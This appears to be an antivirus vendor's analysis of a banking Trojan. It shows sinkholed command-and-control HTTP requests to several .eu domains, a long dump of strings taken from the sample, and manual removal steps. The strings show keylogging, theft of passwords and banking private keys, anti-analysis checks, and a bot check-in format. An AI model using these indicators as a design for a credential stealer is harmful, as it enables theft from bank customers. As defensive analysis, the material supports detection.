User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: norumikemem.eu
Content-Length: 9
Cache-Control: no-cache
....~7.~'
HTTP/1.1 404 Not Found
Server: nginx 1.1.19
Date: Sat, 03 Sep 2016 06:20:38 GMT
X-Malware-Sinkhole: Arbor Networks
Connection: close
POST /login.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: cihunemyror.eu
Content-Length: 9
Cache-Control: no-cache
....~7.~'
HTTP/1.1 404 Not Found
Server: nginx 1.1.19
Date: Sat, 03 Sep 2016 06:20:13 GMT
X-Malware-Sinkhole: Arbor Networks
Connection: close
POST /login.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: lysovidacyx.eu
Content-Length: 9
Cache-Control: no-cache
....~7.~'
HTTP/1.1 404 Not Found
Server: nginx 1.1.19
Date: Sat, 03 Sep 2016 06:20:13 GMT
X-Malware-Sinkhole: Arbor Networks
Connection: close
POST /login.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: lyvejujolec.eu
Content-Length: 9
Cache-Control: no-cache
....~7.~'
HTTP/1.1 404 Not Found
Server: nginx 1.1.19
Date: Sat, 03 Sep 2016 06:20:12 GMT
X-Malware-Sinkhole: Arbor Networks
Connection: close
POST /login.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: tufecagemyl.eu
Content-Length: 9
Cache-Control: no-cache
....~7.~'
HTTP/1.1 404 Not Found
Server: nginx 1.1.19
Date: Sat, 03 Sep 2016 06:20:38 GMT
X-Malware-Sinkhole: Arbor Networks
Connection: close
POST /login.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: pupujeguper.eu
Content-Length: 9
Cache-Control: no-cache
....~7.~'
HTTP/1.1 404 Not Found
Server: nginx 1.1.19
Date: Sat, 03 Sep 2016 06:20:38 GMT
X-Malware-Sinkhole: Arbor Networks
Connection: close
POST /login.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: vocakemenir.eu
Content-Length: 9
Cache-Control: no-cache
....~7.~'
HTTP/1.1 404 Not Found
Server: nginx 1.1.19
Date: Sat, 03 Sep 2016 06:20:49 GMT
X-Malware-Sinkhole: Arbor Networks
Connection: close
POST /login.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: vocakemenir.eu
Content-Length: 9
Cache-Control: no-cache
....~7.~'
HTTP/1.1 404 Not Found
Server: nginx 1.1.19
Date: Sat, 03 Sep 2016 06:20:49 GMT
X-Malware-Sinkhole: Arbor Networks
Connection: close
POST /login.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: fokyxazolar.eu
Content-Length: 9
Cache-Control: no-cache
....~7.~'
HTTP/1.1 404 Not Found
Server: nginx 1.1.19
Date: Sat, 03 Sep 2016 06:20:12 GMT
X-Malware-Sinkhole: Arbor Networks
Connection: close
POST /login.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: ryqecolijet.eu
Content-Length: 9
Cache-Control: no-cache
....~7.~'
HTTP/1.1 404 Not Found
Server: nginx 1.1.19
Date: Sat, 03 Sep 2016 06:20:13 GMT
X-Malware-Sinkhole: Arbor Networks
Connection: close
POST /login.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: puvybivihox.eu
Content-Length: 9
Cache-Control: no-cache
....~7.~'
HTTP/1.1 404 Not Found
Server: nginx 1.1.19
Date: Sat, 03 Sep 2016 06:20:48 GMT
X-Malware-Sinkhole: Arbor Networks
Connection: close
The Trojan connects to the servers at the folowing location(s):
.text
`.data
.reloc
`.rdata
@.data
<>http
PASSu98V
PASSu08V
FTPQ
12345678
password1
monkey
monkey1
password
Pname.key
\secrets.key
kernel32.dll
\explorer.exe
user32.dll
multi_pot.exe
HookExplorer.exe
proc_analyzer.exe
sckTool.exe
sniff_hit.exe
sysAnalyzer.exe
idag.exe
ollydbg.exe
dumpcap.exe
wireshark.exe
avp.exe
Software\Microsoft\Windows NT\CurrentVersion
%s!%s!X
sysinfo.log
scr.jpg
minidump.bin
%d.%d.%d.%d
Ý %dh %dm
%s:%d
Software\Microsoft\Internet Explorer\TypedURLs
url%i
4.8.14
%dx%d@%d
%c%d:d
{Windows directory:links.log
\History.IE5\index.dat
\Opera\Opera\typed_history.xml
avast.com
93.191.13.100
drweb
eset.com
z-oleg.com
kltest.org.ru
.comodo.com
google.com
Dnsapi.dll
ws2_32.dll
Referer: hXXp://VVV.google.com
Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
/login.php
Global\{EAF799BF-8249-4fe1-9A0D-92CD3CC22014}Global\{EAF799BF-8449-4fe1-9A0D-95CD39DC2014}/search.php
Winmm.dll
Kernel32.dll
Gdi32.dll
ntdll.dll
hXXp://
hXXps://
HTTP/1.
nspr4.dll
PR_OpenTCPSocket
[[[URL: %s
Process: %s
User-agent: %s]]]
{{{%sCrypt32.dll
CertVerifyCertificateChainPolicy
Wininet.dll
HttpSendRequestA
HttpSendRequestW
HttpSendRequestExA
HttpSendRequestExW
set_url
microsoft.public.win32.programmer.kernel
\iexplore.exe
\firefox.exe
keygrab
u.jpg
IprivLibEx.dll
\\.\PhysicalDrive%u
/topic.php
keylog.txt
sniff.log
passwords.txt
%s%u.zip
Content-Disposition: form-data; name="file"; filename="report"
HTTP/1.0
Content-Type: application/x-www-form-urlencoded
Content-Type: multipart/form-data; boundary=---------------------------%s
VVV.bing.com
VVV.microsoft.com
frd.exe
command=config&update_url=
&port=
command=load&url=
SYSTEM\CurrentControlSet\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000SYSTEM\CurrentControlSet\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0001SYSTEM\CurrentControlSet\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0002SYSTEM\CurrentControlSet\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0003hid=%s&username=SYSTEM&compname=%s&bot_version=4.8.14&uptime=%u&os=u&local_time=%s%d&token=%d&socks_port=%u&hardware[display]=%s&hardware[driver_av]=%s
\chrome.exe
\svchost.exe
\opera.exe
\cbmain.ex
\iscc.exe
\clmain.exe
\wclnt.exe
internal_wutex_0xx
%s.dbf
%s.DBF
pop2://%s:%s@%s:%i
pop3://%s:%s@%s:%i
nntp://%s:%s@%s:%i
PTF://%s:%s@%s:%i
PTF://anonymous:
AUTHINFO PASS
j_password=
pass.log
command=auth_loginByPassword&back_command=&back_custom1=&
edClientLogin=
edUserLogin=
edPassword=
&LOGIN_AUTHORIZATION_CODE=
login=
password=
pass_
ssleay32.dll
advapi32.dll
path.txt
keys.zip
Local\{BE3C9D87-B91F-4e47-8B00-69798A04C732}%s\d.jpg
Local\{AA53E2BF-8989-4fe1-9A0D-95CD39DC0A14}Local\{EAF799BF-8989-4fe1-9A0D-95CD39D44014}keys
private.txt
public.txt
\*.key
\self.cer
self.cer
self.pub
Local\{EAF799BF-8989-4fe1-9A0D-95CD39DC2014}ctunnel.exe
ctunnel.zip
path_ctunnel.txt
header.key
keys99
\header.key
masks2.key
\masks2.key
masks.key
\masks.key
\name.key
primary2.key
\primary2.key
primary.key
\primary.key
keys99.zip
path99.txt
bsi.dll
&domain=letitbit.net&
cc.txt
Local\{EAF799BF-8989-4fa1-9A0D-95CD39DC0214}prv_key.pfx
keys\
sign.cer
Local\{AAFEE2BF-8989-4fe1-9A0D-95CD39DC0A14}sks2xyz.dll
vb_pfx_import
Local\{EAF799BF-8989-4fe1-9A0D-95CD39DC0214}secret.key
pubkeys.key
Local\{AAF799BF-8989-4fe1-9A0D-95CD39DC0A14}path1.txt
inter.zip
interpro.ini
Local\{EAF329BF-8989-4fe1-9A0D-95CD39DC0214}Local\{AAF733BF-8989-4fe1-9A0D-95CD39DC0A14}Local\{BQQQW777-B777-4e47-8B10-69798A04C732}cbsmain.dll
Local\{BE3C9D87-B777-4e47-8B10-69798A04C732}pass.txt
Local\{EAF799BF-8989-4fe1-9A0D-95CD777C0214}FilialRCon.dll
ISClient.cfg
Local\{EAF777BF-8989-4fe1-9A0D-95CD777C0214}rfk.zip
Local\{EAF777FF-8989-4fe1-9A0D-95CD777C0214}Local\{EAF777FF-8989-4fe1-977D-95CD777C0214}Agava_Client.exe
KeysDiskPath
Agava_Client.ini
Agava_keys
keys_path.txt
Local\{AA53E2BF-8989-4EEE-9A0D-95CD39DC0A14}mespro.dll
AddPSEPrivateKeyEx
core.exe
data\id.dbf
\data\id.dbf
keys%i.zip
path%i.txt
Local\{EAF7722F-8989-4fe1-977D-95CD777C0214}cert.pem
Local\{BE3CEFA7-B777-4e47-8B10-69745D04C732}winmm.dll
1.2.5
unzip 1.01 Copyright 1998-2004 Gilles Vollant - hXXp://VVV.winimage.com/zLibDll
zip 1.01 Copyright 1998-2004 Gilles Vollant - hXXp://VVV.winimage.com/zLibDll
%s\%s
#webcam
#webcam%d
RFB d.d
%s (%s)
d/d/d d:d
password check failed!
WinSCard.dll
SensApi.dll
GetTcpTable
IPHLPAPI.DLL
dbghelp.dll
PSAPI.DLL
NETAPI32.dll
DNSAPI.dll
HttpQueryInfoA
HttpAddRequestHeadersW
HttpAddRequestHeadersA
HttpOpenRequestA
WININET.dll
WS2_32.dll
SHFileOperationA
SHELL32.dll
SHLWAPI.dll
GetSystemWindowsDirectoryA
WinExec
SetThreadExecutionState
GetWindowsDirectoryA
KERNEL32.dll
GetKeyboardState
MsgWaitForMultipleObjects
GetKeyboardLayoutList
GetAsyncKeyState
GetKeyboardLayout
MapVirtualKeyW
VkKeyScanW
VkKeyScanExW
keybd_event
EnumChildWindows
ActivateKeyboardLayout
SetKeyboardState
USER32.dll
SetViewportOrgEx
GetViewportOrgEx
GDI32.dll
RegOpenKeyExA
RegCloseKey
RegFlushKey
RegNotifyChangeKeyValue
RegDeleteKeyA
RegEnumKeyExA
RegOpenKeyExW
RegQueryInfoKeyW
RegEnumKeyExW
ADVAPI32.dll
ole32.dll
OLEAUT32.dll
gdiplus.dll
MSVCRT.dll
AVICAP32.dll
MSVFW32.dll
ShellExecuteW
GetProcessHeap
?456789:;<=
!"#$%&'()* ,-./0123
;3 #>6.&
'2, / 0&7!4-)1#
5`6C6Q6}6
55
;";,;6;<;_;{;6&7-737<7|7
3"33393>3}3
;#;);/;=;
<"=3=9=>=}=
:(:-:8:=:
7#7)7/7=7
9&9,929@9
0!02090>0
>$>*>4>9>
Windows Explorer
mavast.com
ya.ru
serverkey.dat
\windows\
dntdll.dll
.NET CLR Networking_Perf_Library_Lock_PID_0
.NET Data Provider for SqlServer_Perf_Library_Lock_PID_0
ASP.NET_2.0.50727_Perf_Library_Lock_PID_0
SOFTWARE\JavaSoft\Java Plug-in\1.6.0_%d
Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\%d
Software\Microsoft\Windows\CurrentVersion\Internet Settings
iexplore.exe
HighMemoryEvent_x
MSCTF.Shared.MAPPING.x
MSCTF.Shared.EVENT.x
MSCTF.Shared.MUTEX.x
.Prev
.current
Explorer.EXE_1572_rwx_02060000_000B8000:
.text
`.rdata
@.data
.reloc
<>http
PASSu98V
PASSu08V
FTPQ
12345678
password1
monkey
monkey1
password
Pname.key
\secrets.key
kernel32.dll
\explorer.exe
user32.dll
multi_pot.exe
HookExplorer.exe
proc_analyzer.exe
sckTool.exe
sniff_hit.exe
sysAnalyzer.exe
idag.exe
ollydbg.exe
dumpcap.exe
wireshark.exe
avp.exe
Software\Microsoft\Windows NT\CurrentVersion
%s!%s!X
sysinfo.log
scr.jpg
minidump.bin
%d.%d.%d.%d
Ý %dh %dm
%s:%d
Software\Microsoft\Internet Explorer\TypedURLs
url%i
4.8.14
%dx%d@%d
%c%d:d
{Windows directory:links.log
\History.IE5\index.dat
\Opera\Opera\typed_history.xml
avast.com
93.191.13.100
drweb
eset.com
z-oleg.com
kltest.org.ru
.comodo.com
google.com
Dnsapi.dll
ws2_32.dll
Referer: hXXp://VVV.google.com
Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
/login.php
Global\{EAF799BF-8249-4fe1-9A0D-92CD3CC22014}Global\{EAF799BF-8449-4fe1-9A0D-95CD39DC2014}/search.php
Winmm.dll
Kernel32.dll
Gdi32.dll
ntdll.dll
hXXp://
hXXps://
HTTP/1.
nspr4.dll
PR_OpenTCPSocket
[[[URL: %s
Process: %s
User-agent: %s]]]
{{{%sCrypt32.dll
CertVerifyCertificateChainPolicy
Wininet.dll
HttpSendRequestA
HttpSendRequestW
HttpSendRequestExA
HttpSendRequestExW
set_url
microsoft.public.win32.programmer.kernel
\iexplore.exe
\firefox.exe
keygrab
u.jpg
IprivLibEx.dll
\\.\PhysicalDrive%u
/topic.php
keylog.txt
sniff.log
passwords.txt
%s%u.zip
Content-Disposition: form-data; name="file"; filename="report"
HTTP/1.0
Content-Type: application/x-www-form-urlencoded
Content-Type: multipart/form-data; boundary=---------------------------%s
VVV.bing.com
VVV.microsoft.com
frd.exe
command=config&update_url=
&port=
command=load&url=
SYSTEM\CurrentControlSet\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000SYSTEM\CurrentControlSet\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0001SYSTEM\CurrentControlSet\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0002SYSTEM\CurrentControlSet\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0003hid=%s&username=SYSTEM&compname=%s&bot_version=4.8.14&uptime=%u&os=u&local_time=%s%d&token=%d&socks_port=%u&hardware[display]=%s&hardware[driver_av]=%s
\chrome.exe
\svchost.exe
\opera.exe
\cbmain.ex
\iscc.exe
\clmain.exe
\wclnt.exe
internal_wutex_0xx
%s.dbf
%s.DBF
pop2://%s:%s@%s:%i
pop3://%s:%s@%s:%i
nntp://%s:%s@%s:%i
PTF://%s:%s@%s:%i
PTF://anonymous:
AUTHINFO PASS
j_password=
pass.log
command=auth_loginByPassword&back_command=&back_custom1=&
edClientLogin=
edUserLogin=
edPassword=
&LOGIN_AUTHORIZATION_CODE=
login=
password=
pass_
ssleay32.dll
advapi32.dll
path.txt
keys.zip
Local\{BE3C9D87-B91F-4e47-8B00-69798A04C732}%s\d.jpg
Local\{AA53E2BF-8989-4fe1-9A0D-95CD39DC0A14}Local\{EAF799BF-8989-4fe1-9A0D-95CD39D44014}keys
private.txt
public.txt
\*.key
\self.cer
self.cer
self.pub
Local\{EAF799BF-8989-4fe1-9A0D-95CD39DC2014}ctunnel.exe
ctunnel.zip
path_ctunnel.txt
header.key
keys99
\header.key
masks2.key
\masks2.key
masks.key
\masks.key
\name.key
primary2.key
\primary2.key
primary.key
\primary.key
keys99.zip
path99.txt
bsi.dll
&domain=letitbit.net&
cc.txt
Local\{EAF799BF-8989-4fa1-9A0D-95CD39DC0214}prv_key.pfx
keys\
sign.cer
Local\{AAFEE2BF-8989-4fe1-9A0D-95CD39DC0A14}sks2xyz.dll
vb_pfx_import
Local\{EAF799BF-8989-4fe1-9A0D-95CD39DC0214}secret.key
pubkeys.key
Local\{AAF799BF-8989-4fe1-9A0D-95CD39DC0A14}path1.txt
inter.zip
interpro.ini
Local\{EAF329BF-8989-4fe1-9A0D-95CD39DC0214}Local\{AAF733BF-8989-4fe1-9A0D-95CD39DC0A14}Local\{BQQQW777-B777-4e47-8B10-69798A04C732}cbsmain.dll
Local\{BE3C9D87-B777-4e47-8B10-69798A04C732}pass.txt
Local\{EAF799BF-8989-4fe1-9A0D-95CD777C0214}FilialRCon.dll
ISClient.cfg
Local\{EAF777BF-8989-4fe1-9A0D-95CD777C0214}rfk.zip
Local\{EAF777FF-8989-4fe1-9A0D-95CD777C0214}Local\{EAF777FF-8989-4fe1-977D-95CD777C0214}Agava_Client.exe
KeysDiskPath
Agava_Client.ini
Agava_keys
keys_path.txt
Local\{AA53E2BF-8989-4EEE-9A0D-95CD39DC0A14}mespro.dll
AddPSEPrivateKeyEx
core.exe
data\id.dbf
\data\id.dbf
keys%i.zip
path%i.txt
Local\{EAF7722F-8989-4fe1-977D-95CD777C0214}cert.pem
Local\{BE3CEFA7-B777-4e47-8B10-69745D04C732}winmm.dll
1.2.5
unzip 1.01 Copyright 1998-2004 Gilles Vollant - hXXp://VVV.winimage.com/zLibDll
zip 1.01 Copyright 1998-2004 Gilles Vollant - hXXp://VVV.winimage.com/zLibDll
%s\%s
#webcam
#webcam%d
RFB d.d
%s (%s)
d/d/d d:d
password check failed!
WinSCard.dll
SensApi.dll
GetTcpTable
IPHLPAPI.DLL
dbghelp.dll
PSAPI.DLL
NETAPI32.dll
DNSAPI.dll
HttpQueryInfoA
HttpAddRequestHeadersW
HttpAddRequestHeadersA
HttpOpenRequestA
WININET.dll
WS2_32.dll
SHFileOperationA
SHELL32.dll
SHLWAPI.dll
GetSystemWindowsDirectoryA
WinExec
SetThreadExecutionState
GetWindowsDirectoryA
KERNEL32.dll
GetKeyboardState
MsgWaitForMultipleObjects
GetKeyboardLayoutList
GetAsyncKeyState
GetKeyboardLayout
MapVirtualKeyW
VkKeyScanW
VkKeyScanExW
keybd_event
EnumChildWindows
ActivateKeyboardLayout
SetKeyboardState
USER32.dll
SetViewportOrgEx
GetViewportOrgEx
GDI32.dll
RegOpenKeyExA
RegCloseKey
RegFlushKey
RegNotifyChangeKeyValue
RegDeleteKeyA
RegEnumKeyExA
RegOpenKeyExW
RegQueryInfoKeyW
RegEnumKeyExW
ADVAPI32.dll
ole32.dll
OLEAUT32.dll
gdiplus.dll
MSVCRT.dll
AVICAP32.dll
MSVFW32.dll
ShellExecuteW
GetProcessHeap
?456789:;<=
!"#$%&'()* ,-./0123
;3 #>6.&
'2, / 0&7!4-)1#
SYSTEM!XP10!F9BE9A8A
%WinDir%\apppatch\dypttm.exe
%Documents and Settings%\%current user%\Application Data\
5`6C6Q6}6
55
;";,;6;<;_;{;6&7-737<7|7
3"33393>3}3
;#;);/;=;
<"=3=9=>=}=
:(:-:8:=:
7#7)7/7=7
9&9,929@9
0!02090>0
>$>*>4>9>
`.data
Windows Explorer
mavast.com
ya.ru
serverkey.dat
\windows\
dntdll.dll
.NET CLR Networking_Perf_Library_Lock_PID_0
.NET Data Provider for SqlServer_Perf_Library_Lock_PID_0
ASP.NET_2.0.50727_Perf_Library_Lock_PID_0
SOFTWARE\JavaSoft\Java Plug-in\1.6.0_%d
Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\%d
Software\Microsoft\Windows\CurrentVersion\Internet Settings
iexplore.exe
HighMemoryEvent_x
MSCTF.Shared.MAPPING.x
MSCTF.Shared.EVENT.x
MSCTF.Shared.MUTEX.x
.Prev
.current
Remove it with Ad-Aware
- Click (here) to download and install Ad-Aware Free Antivirus.
- Update the definition files.
- Run a full scan of your computer.
Manual removal*
- Scan a system with an anti-rootkit tool.
- Terminate malicious process(es) (How to End a Process With the Task Manager):
%original file name%.exe:188
- Delete the original Trojan file.
- Delete or disinfect the following files created/modified by the Trojan:
%WinDir%\AppPatch\dypttm.exe (2025 bytes)
%System%\config\software (2245 bytes)
%System%\config\SOFTWARE.LOG (3715 bytes) - Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
- Reboot the computer.
*Manual removal may cause unexpected system behaviour and should be performed at your own risk.